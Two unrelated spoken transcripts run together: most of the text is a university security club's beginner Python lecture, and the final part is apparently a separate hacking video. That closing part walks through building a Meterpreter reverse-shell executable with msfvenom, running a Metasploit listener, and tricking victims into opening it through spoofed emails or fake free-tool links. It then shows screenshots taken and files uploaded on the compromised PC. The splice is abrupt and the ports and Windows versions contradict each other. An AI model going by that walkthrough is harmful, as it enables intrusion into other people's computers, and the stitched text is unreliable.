And today we're going to be going through an intro to Python, a very basic intro to a very powerful and widely used language. So before that, we have some announcements to talk about. So CSG Fire Talks are going to happen in March. These are talks that any current student can come up here and give a 10 to 20 minute talk about a security-related topic of their choice. HackUTD is going to be on the 23rd and 24th of this month. I think this weekend, right? Yeah. So that's going to be cool. It's kind of an intro CTF, capture the flag kind of thing, where we are going to host a CTF for that event on the second day, I believe. First day, sorry. Yeah. So, some of the officers worked on that, and we expect that to be pretty fun to do. The MITRE Cyber Challenge on the 22nd is going to be a more advanced CTF. We are probably going to be doing that, some of us. And then Cisco is going to come give a talk on March 1st. They're going to be hosting customers and students to share live demos with over 10 presenters. This is a one-day event focused on technical discussions, how to engage TAC. I'm not sure what that is. It's free to attend, but you guys have to sign up because there are limited slots available. And then InfoSec is an information security community event organization. They are having an event on the 26th of this month, that's next Tuesday, in JSON. And if you have any questions about that, I'm going to let Barrick, right? Yes. Barrick. Any questions, go to him. You can come and ask him after the talk, or also there are flyers up here if you want to come take a picture of those. Cool. Okay, so Python actually was named after Monty Python. Apparently this is not general knowledge, so I thought it would be fun to include it. It was not named after the snake, and it has no relation to snakes. The developer of Python, Guido van Rossum, actually named it after his favorite TV show, Monty Python's Flying Circus, I believe. It's a descendant of ABC, and ABC is a general-purpose programming language whose biggest accomplishment was to father Python. So forget about ABC, it's not important. The language was developed to appeal to Unix and C programmers for better readability and more functionality in that environment. So how many 2.7 elitists do we have in here? I count one. Okay. So the two, for a long while, 2.7 was considered to be the best version of Python, and then 3.0 came out, and there is some debate, let's say, about which version is better.
Sounds deprecated. It's bad.
Like that? Yeah. So some differences among the many include, like, print is now a function. That's like the most obvious one to the untrained eye. There's one integer type, and integer division now yields a float instead of an integer. So, like, if you divide 2 by 2, you get like 1.0 instead of 1, something like that. So one of the best ways to get started with engaging with Python is to use a shell. So if you have Python installed in an environment, you can activate the shell by typing Python, and we're going to do that in a little demo right now. Oh, yeah. All right. Is that good? Everyone see that? Hearing yes. All right. So I'm going to take this opportunity to introduce you guys to a Linux environment called CS1. Does everyone see that?
Probably change the contrast.
What?
You change it to white.
I can try. Hang on, let's see. Is that better for you guys?
Wow. Yeah.
Much better? Yeah? Okay. Awesome. That's enough back there. We're good. All right. So there are a number of Linux environments that computer science students can use. They're called CS1, CS1 grads, and a bunch of others. These are available to you to program in a Linux environment, and they have a lot of tools installed on them already, like Python, OpenSSL. There's, I think, stuff for different programming languages on there. I think there's something for like Prolog, Fortran, just a bunch of stuff. I'm not hitting all of it, but there's a lot of stuff. So we're going to do that for our Python thing. So the way to get into that is you're going to SSH netid at cs1.dallas.edu. Okay, so this environment is really useful for when you don't want to do anything on your home machine and you can just work in kind of a sandbox. The rules of this are kind of stated here, and I cannot stress this enough. I know this is a security club. Do not try an nmap or do anything security related to these servers. TMOC will appear in your closet at night and beat the crap out of you. Do not. All right. So if I type Python and I tab a couple times, we see all the different versions of Python that we have here. All right. So these are all the versions of Python that we have currently installed on this environment. The default, if you just hit Python, is Python 2.7.5. That's what we're going to be demoing today. So this is the Python interactive shell, which means you type commands, you get something back immediately. So if I just type something, hello, it's not going to recognize that because it's not a command. So if I do print hello, it gives back hello. Now, only in the interactive shell can I do something like this, where I just have the two quotation marks, because that won't work in scripting, which is something I'm going to show right after this. So, what kinds of things can we do with the interpreter? Well, the interpreter can do arithmetic pretty well. It'll give you basic math operations, addition, subtraction, division, blah, blah, blah. It can also store variables. It remembers things. So if I do something like dank equals 8, memes equals 9, and then dank times memes is 72, because it remembered the values of 8 and 9, associated them with their variables, and stored them and computed the result. It can also do stuff like addition with those same variables. Yeah. I want to get this right for the meme, I'm sorry. Okay, now if we run this command again, there we go, much better. All right. So, now let me just go back to the presentation for 1 second. So, a key element of Python, it has these distinct data types. So there are 4 big ones: list, tuple, set, and dictionary. They have different attributes. Let me check the questions for 1 second. No.
Read the question.
Why did the interpreter say 4.7 times 10.3 equals 48.41000004 instead of 48.41? That is because the output wasn't formatted. There are different ways to format the output. I don't have all of them listed, but it's very easy to Google. So you can specify how you want your results to print in Python in both the interactive shell and the script and in a Python script. But that is controllable, and Python will allow you to format the output. That is apparently the default, and I'm not sure exactly what it's doing, but I know that it is controllable. One dot O or 1.0, it is 1.0 because that represents a float, as in a number with a decimal point. Okay, so we have these 4 collection data types, and we're going to do different things with them. It's going to be fun. So first of all, we're going to talk about lists. So a list is, as the slide said, it's ordered, mutable, and it allows duplicates. This means that the elements in the list are in a distinct order. You can change them, and you can have 2 of the same thing, or multiple of the same thing. So if I make a new list and I say A, B, C, D, and I say listy, if I could type, yeah, there we go. So that lists everything. That is listy. It's a list of those elements. So now I'm going to jump ahead a little bit. We're going to use a function that we're going to use for most of these data types here. So if I want to make a function, that is a set of instructions that I want to be able to call every time. I'm assuming a lot of you know what functions are, but for the sake of those who don't, I'm going to say that. So if I want to make a function, def print stuff, thing. So what this does is it defines a function called print stuff, and it takes an argument that I'm calling thing. I'm going to use the word thing to refer to the argument to the function, or what's passed in. So for x in thing, meaning for any thing x in thing, it's a little vague, but we'll get it. Ah, crap. I forgot to mention, Python really likes indentation. So there are no braces in Python because it depends on how you indent your code. That's how it knows what belongs to what and how to follow program control. So for x in thing, print x. Then we can do that, and then we can do that, and then print stuff is defined now. So if I do print stuff listy, it goes and it finds listy that was saved by the interpreter, and it prints all the elements of listy. Okay? So some of the functionality that lists have, we can append things to lists. For an example, .append k. And then if we show listy again, we see that there's a k at the end now. We can also insert stuff to listy at a certain index because they are ordered. So listy.insert. Let's do yeet at index 2. Or, would be more accurate, to yeet. Actually, you know what? Why would that not? I know the way to do it, it's just not letting me do it right now. That's weird. Anyway, I'll come back to that later. If you want to get the length of a certain thing, you can type len. This works for most of the data types here. So it currently has 5 elements in it, and that's what it prints out.
Index is first.
Index is first? That's what I thought. We will yeet, I promise. There we go. So now we can print listy again. And we see that listy is at, or yeet is at 0, 1, 2, index 2. And then if we go back into our len function, it now has 6 elements in it because you added 1. So you don't have to append stuff just to the end. You can append it anywhere in the list. Okay. Another cool thing. If we reverse it, it actually reverses it. So a lot of this functionality is stuff that you can do in C++ and C. It just has it natively, which is why it appealed to the Unix and Linux developers, because it just was there, already worked, and it made coding a little bit faster. Okay, now, next data type we'll explore is the tuple. I'm going to call this tup because it's fun. Tuples use parentheses as opposed to brackets. Tuples are ordered, they are immutable, meaning you cannot change their elements, and it does allow duplicates. So we're going to have apple, banana, and cherry. Favorite fruits. Cool. So again, we can run a length function. Oh, there. There's 3 elements in that thing. So the length function again will work on any collection data type. It'll tell you how many elements are in that thing. Now if we try to, oh, actually, you know what? Let me show you something. Listy at 2 equals f. So what I did here was I took the element at index 2 in listy, and reassigned it to f. So if we print listy again, 0, 1, 2, that is now f. I did that to illustrate this. Remember I said tuples are immutable? This is an example of that. You cannot reassign elements of a tuple. That's one of its characteristics that differentiates it from a list. You also can't have duplicates in a tuple. So if I were to go back into listy and put 2 of the same element, it would allow me. If I were to do that here, it would not allow me. There are distinct advantages and merits of these different data types, and they become apparent the more you program in Python. You're going to be like, this collection data type is more suitable for what I want to do here, and this one's better for what I want to do here. So now let's go into sets. Sets are pretty interesting. Sets use braces. Sets are unordered, unindexed, and they don't allow duplicates. So the term unindexed means they don't actually have indexes, as you can guess. So if I were to define set, just numbers, right? If I did set 2, it's not indexed. Therefore, it can't really tell me what set 2 is. I can add things to the set. They don't have to be the same type of element either, so I can do something like this. Add. Orange. And now if I print set, it put it at the beginning, right? So this behavior is a little unpredictable. It orders it in a way that's not always obvious, and that's because of the fact that it's unindexed. It is useful for containing things, but not necessarily for ordering things. Okay, so that's sets, and then the last collection data type that we're going to talk about is the dictionary. So the dictionary, I think, is probably the most interesting of these because it's premised on the fact that you can have a key value and you can have multiple of those. So it has key value pairs, meaning that each element in the dictionary consists of a key value pair. So you can call on the key and get the value. So that looks like this. Dictionary is, let's do, it has braces again, but each key value pair is separated by a colon. CSG colon, cool, comma, thing, other thing, tmock. Can I get a suggestion? Which tmock's key be? Anyone?
God.
Okay.
I suggested some
Oh, come on.
Someone called it.
Come on. Are we messing up, guys? Yeah, you're right. I misplaced the comma. Okay. So, that's our dictionary. So, what we can do with this dictionary, let's try this. Dict at, I want to say, thing. Can we do this? Yes. So we can actually use our keys as indexes. So remember how we did like listy at 2 or whatever? This works just like that in that our indexes are now not only like numeric values, they can be the keys of the dictionary. So if you had like a list of words that you wanted to store, or like first and last names, a dictionary would have a lot of functionality built in for you in Python that you'd be able to use for whatever application you're putting that into. Now, let's go back to our print function, but let's do it a little differently. Print keys. Dictionary. Okay, so if I want to print all my values in this dictionary, but not necessarily the keys, I can do that the following way. I can write a loop that says for x in dictionary, and this dictionary has to match this one, because this is the name that we're using for whatever gets passed into this function. For x in dictionary, print. So if this is a dictionary and I want to access the keys, and I access the key up here with thing, I'm going to do the exact same thing in my loop. Dictionary at x. So now if I do print keys with dict, it's going to go in, look at all the keys. Actually, I should say print values, whatever. It's going to look at all the keys in the dictionary and then print all the values of those keys. Other thing, cool, and God. Cool. So those are the 4 big collection data types, kind of arrays. And then, let's see. Can you turn the lights off in the back? I don't know, can we? I mean, we can, but it wouldn't make for a very good... I want to look at you guys, too. You're beautiful. Why is Python... hang on. Why is Python considered more powerful when it comes to machine learning or data aggregation. I heard professors speak to Python as a replacement for R and Hadoop because of its functionality. I actually have heard that too. R has been, at least in my view, one of the more widely used or respected data aggregation, data science languages, but I did read an article recently that Python is kind of overtaking that. I'm actually not sure. I would be willing to bet that someone else in this room knows, though. Yes?
I would think that it's entirely due to the incredible library support.
That's a good point.
That exists in Python, like pandas.
The latter part of this presentation kind of talks about some libraries. So a very big aspect of Python, as this person brought up, is that it has a lot of libraries, a lot of collections of methods and other stuff that are readily available to use. And it's probably due to that it's kind of overtaking or catching up to R for the functionalities used in data aggregation. So the last part of this demo over here is to quit out of the Python interactive shell. We just do quit. Bigger? How's that? Okay, cool. All right, so I have a file here called durwalk.py. I wrote this in preparation for this event, and we're going to see how it works. So, can everyone see that? Is it kind of... Yeah, it's weird. I don't know. So, I think VI would be better. Yeah. Well. Okay. Okay, there. All right, so let's talk about the structure of this little program here. So up here, we have import statements. This might be redundant, I'm not sure, but from OS import walk, that's saying from this library import this functionality. And then import OS, that's just saying import the library. Maybe some latency there, I'm not sure, it works. So, the next line, this is a variable name, and this is going to be a functionality included in OS. So this basically gets the current working directory, which anyone who has Linux knows that the current directory you're in is the current working directory, and that is something that this library of Python knows how to do. So then this here is where I assign two variables to be two collection data types, and the brackets tell me that those are lists because we just went over lists. So these are currently two empty lists, F and D. So now we see a loop here, kind of like the one I wrote earlier. So this walk function, what it does is it'll return three things. It will return a path, or a directory path, a name of the directory, and a file name. So for every time that it does that, I'm taking those values and putting them into two lists. So this extend functionality is basically going to put that into the list. So I'm putting the file names into the F list and the directory names into the D list, and then cutting it off. So at the end of the loop, I'm just going to print the word files and then the F list, which is going to be all the files it collected from that, which is also going to be all the files in the working directory at that time. And then directories, same thing. So it's going to print that word, and then all the directories that it collected, which is going to be all the directories in the current working directory. Get out of here. Okay. So to run a Python script, which is what that is, I just type Python and then the name of the script. Okay, so what it did was it printed files, and then these are all the files in this directory. And if we actually go and confirm that. It has a lot of hidden files. This directory might not be a very pretty example, but it did do the job. So everything that doesn't have a D on the end of it, that's a file, and it was collected by durwalk.py. Same with directories here. It went through and got all the directories in the current working directory and put them in a list and printed it out. So that's just like one small example of the functionality of, or the use cases of lists or Python collection data types. Okay. So what about security? This is CSG, right? So as I said earlier, as we talked about a little bit before, there are a lot of libraries in Python. That means there are a lot of tools that do many different things. And it's hard to know all of them. I actually was, in my youth, as a freshman, I was guilty of not getting involved enough with Python, so now I'm having to go back and get more engaged with it because it is very important to the field of security, because there's a lot of tools out there that are written in Python that you use Python for. So if you're a freshman, and even if you're not doing security, you should get at least acquainted with Python. There are tutorials online, and they'll help you if you ever decide to go into security or just for anything, because a lot of people use Python. So now let's talk about some of the libraries that Python has. So a very common and popular one is pwntools. Hang on. We have a question here. So can you read the command in the shell? So for PC, I forgot to mention this. If you want to access CS1 or any Linux server from a PC, you need to use a client like Putty, P-U-T-T-Y. It's an SSH client, which means it can allow you to get from a Windows machine to a Linux environment. So just Google P-U-T-T-Y, Putty, and you'll be able to figure that out, hopefully. So I think CS1 only allows CS students, which is what I mentioned, but you can do this on any system that has, any system that has Python installed. So you don't have to be in CS1. I just used that for my example, but you can find any place that has Python installed, and you'll be able to get an interactive shell, write scripts, run those scripts. But you might not be able to get into CS1 if you're not a CS student. But if you are, go for it. Just do not nmap it, please. Very bad. Will Python ever surpass C++? I think if they start teaching it in university, it might, because there are very few Python classes here. Like, has anyone here taken a class for Python in Python? What was it?
It was at a community college, but
Okay.
thank you.
Interesting. That would be cool. I wish they had more Python, like intro to Python classes here, because that would have helped me as a freshman to get more engaged with it. But as far as it surpassing C++, I think that they're two different languages that accomplish two different principles, and they're useful for different things. Different people like them. Some people like both. That's fine too. But my short answer is no. It will not surpass C++ because that's a tricky thing to do. I think everyone got the point of my demo. I'm not going to redo it with bigger font.
Just watch the video.
Yeah, just watch the video. Increase your screen size. Okay, so popular Python library, pwntools, exploit writing in Python. So basically, to import a library to use in a script, in a Python script, all you would do is just say from library name import, and then the functionality you want to import. So the star here means that you just import everything that PwnTools has to offer. It's described as a CTF framework and exploit development library. So basically, it's good for designing exploits and offensive security-related stuff. A part of that is pwnlib, and I've listed 2 of its many functionalities here. So shellcraft I found particularly interesting. It has a bunch of pre-written shellcodes, and those are important for like buffer overflow exploits, which is an entirely other topic, but the point is you can use Python to do a lot of security-related attacks, a lot of security-related endeavors, a lot easier with all of the functionalities that are included in these libraries. And then bit fiddling here. If you want to like do very high-powered like altering of strings, that's what pwnlib.util.fiddling would be useful for. And then PyCryptodome was recommended to me by one of my fellow officers, who's going to know a lot more about this than me, but this is basically great for cryptography, which is another subset of security. It's for like encrypting, decrypting stuff, making stuff secure with hashes and stuff like that. It'll allow you to access and play around with symmetric ciphers, stream ciphers, cryptographic hashes, other cool things like that. Do we have any more questions? In Python 2, print function just writes ASCII text. How do you print pure bytes in Python 3? I can give you 2 answers to this, and they're both true. The first answer is that you can Google it. The second answer is that I don't know right now. Those are both equally true things. But I'm confident. Another great thing about Python, it has great documentation, at least in my opinion. Like, I didn't know Python so well 2 weeks ago, and I do now. Okay? It's not that hard.
True story.
It's pretty fun to learn, and I encourage you to do so because it's useful for a lot of different things. Even if you're not CS, knowing Python and having that on your resume can open a certain number of doors. So my answer to you is Google it. And the answer will appear. If JSON programming courses cover Python and we don't cover Python, something is wrong.
Not 100% sure, but
Yeah? Interesting. How do you find the missing number in a given integer array of 1 to 100?
Do your own homework, Andrew.
Good point. Do your own homework, guys.
Wait, you didn't answer that question.
No, I didn't. No, I will not.
Yes.
Since Node.js JavaScript programmers are taking over the web, do your Python skills feel threatened? They do not. Not at this point, no. Python is also very popular for web stuff, sending requests, making requests, server-side stuff. But I mean, that's only one subset of what Python can accomplish. I think my knowledge is a little faulty here, but I think that I believe that JavaScript is mostly intended for web use, and Python it can be used for the web. So based on my limited experience, I would say that Python is not, as a whole, threatened by JavaScript, and people who know Python should not be threatened by people who know JavaScript. Where's that? Why did Andrew not post this question as anonymous? That's a good point. That is a great point. Because now we got to call him out for it, right? Okay. Other than that, I've got some helpful links here, and that is the end of this presentation. Thank you very much.
So double click on your terminal in Kali Linux. Now give a command called msfvenom space -p space windows / meter preter. -p we use for payload. Okay guys, so msfvenom space -p space windows / meter preter / reverse underscore tcp space lhost equal to the IP address of your Kali Linux operating system. So just click on your terminal and click on new window and give a command called ifconfig for knowing your IP address. So this is my IP address. It's different in every person's case, so just copy your IP address and paste here. So many of you thinking about IP address, what is IP address? So don't worry guys, I will make a separate series on IP address, what is IP addresses, how it works, because I think it's a very important topic for being a hacker or ethical hacker. IP address is very important topic, so I will make a separate series on it. Now give a port L port equal to 4444. I'm just assigning 444. You can use another port, it depends on you which port you want to listen the victim PC. Now give -f we use for format, so I am making for exe format virus. Now -a for architecture, so I'm just using 32-bit architecture, so x into 86. Because 32-bit architecture is something which is compatible with 64-bit and also for 32-bit, so it work on both operating systems, so it is nice. Now angular brackets and give the name of your virus. I'm just giving I love you, or your payload I love you.exe, so it is my payload name. Now press enter and now it's going to make your payload. So another thing I want to share with you guys, I'm just doing this hack inside my LAN. I'm not hacking any computer outside my LAN or in the internet. The reason behind doing this thing inside my LAN, because it's only for educational purpose and I'm just making these videos for beginners, but I am definitely make a video on how to hack outside the LAN where we use port forwarding, which is a different concept. So I will make a video on it I will make a video on how to hack outside the LAN in the future for okay guys, so I hope you understand. So go to your files and click on it and you will be see something inside your root folder, I love you.exe. this is the virus of my file. Okay guys, now what you should need to do, give a command called msfconsole. So open your Metasploit console. So it takes little bit time. Now my Metasploit console is opening. So it's you are seeing the cool banner of Metasploit. Wake up new, the matrix has you, follow the white rabbit. Yeah, just it's awesome. Sorry. So you can change also the banners. Now you need to give a command called use space exploit / multi / handler. I will make a whole series on Metasploit, so don't worry guys. So now press enter and then give a command called set payload windows / meter preter / reverse underscore tcp and press enter. Now set lhost, the same IP address, so just paste here again. So press enter. Now set lport 444 and press enter. Now give a command called exploit. Now what you need to be do, now your Kali Linux operating system is starting the listening through TCP handler on the port 444 using the IP address 192.168.139.129. so now I need to send this payload to my victim's computer. So there is a lots of way to send payload into the any person's computer. You can mail it, or you can spoof the addresses, or there is a lots of way, guys. You can send it through the links. You can say that this is the application, if you install in your computer you will be get money, or you will be get free tunes, or this is the kind of free tool, anything, whatever you want to say. So there is a lots of ways. So use your own brain and your creativity, because in a hacking I believe your evil brain and your evil creativity matters a lot for hacking something or doing something. So but this time I'm just doing this in a LAN, so I have a physical access of that specific computer. So what am I going to do? I'm just copying this payload inside my pen drive. So this is my pen drive, and I'm going into the files, and this is my payload. So I'm just copying this payload inside my pen drive, and because I am hacking the Windows 7 operating system, which is totally vulnerable. The thing is that sometimes we try to hack any PC or computer, but the PCs and computers block our requests, like through the firewalls or through the Windows Defender. They block our virus or Trojan. They show us as a unwanted file, but there is a lots of way through you can bypass the firewalls and antivirus softwares. So I will be tell you in a different video, but for this time I'm just doing this in a Windows 10 operating system, which is totally vulnerable from this. Okay guys, so now I am in my Windows 7 operating system, and I just connecting my pen drive here. So I just connected my pen drive, the both systems in the same network. Okay guys, keep this thing in your brain. So I just connected my pen drive, so I just pasted this payload here. Now I just clicked on that specific payload inside my Windows 7 operating system. So now let's get back into our Kali Linux operating system. So you are guys seeing that we get a Meterpreter session. So we are now inside that our victim's computer. Let's give a command called ls. So that is the file inside of that his system, and I will show you something. So let's see the directory which we are working on. So pwd command show the current working directory. So I am inside the computer of that specific person, and let me show you another commands. You can type help, or so you can get all these commands related to that specific computers. You can dump the hashes of inside of this computer. I will make on separate video on hashes, so I will be show you something. So let's see the informations of that computer. So give a command called sysinfo, so you will be get the all details. This computer is name is lab PC, which is running on Windows 7 and using the 64 architecture, and currently the 2 user logged on it. Let's take some screenshot of his computers. Okay guys, but okay, just let's try to take a screenshot. SCREEN screenshot. So this is a screenshot saved into my computer, so I will be going to show you. The name is in a root directory BZE and something like that. BZE, where is BZE? So this is the picture. So we take the screenshot of that person's specific computer. So let me show you some other cool stuff. So let's make some directories inside of his computer. So I'm just giving command called mkdir. It's used for making directory, like you have been hacked. So I'm just making directory inside of his computer, so I'm just showing you. So there is a directory called you have been hacked. You can also upload any file if you have, like just try to upload some files inside of his computer. So just give a command called upload. Yeah, I have a application called abc.apk. So let's upload this application abc.apk press enter. So this application is uploaded into his computer. So I hope you guys enjoyed this video, and I hope that it will help you a lot about hacking and how to hack PCs and other things. So thank you so much guys for watching this video, and keep support VR hackers.